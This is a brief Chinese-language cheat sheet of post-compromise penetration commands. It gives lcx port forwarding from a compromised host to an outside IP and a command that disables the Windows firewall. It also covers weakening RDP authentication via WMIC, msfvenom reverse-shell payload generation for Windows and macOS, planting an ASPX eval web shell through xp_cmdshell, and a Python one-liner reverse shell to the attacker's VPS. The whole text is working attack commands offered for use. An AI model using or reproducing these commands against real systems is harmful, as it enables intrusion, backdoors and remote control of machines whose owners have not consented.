渗透常用命令笔记

1.内网渗透端口转发：

在被控制机上执行：

lcx.exe -slave 216.32.*.*(一个外网ip) 51  192.168.2.32(内网ip)  端口号

netsh firewall set opmode disable 开启3389后关闭防火墙

在本机上执行：

lcx.exe listen 51 3389

2.win7开3389

1 wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 

 3.msf生成exe

1 msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
2 msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.mach

4.xp_cmdshell 写小马

 exec xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["z"],"unsafe");%^> > 路径+1.aspx'

5.python 反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("你的VPSIP",端口号));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'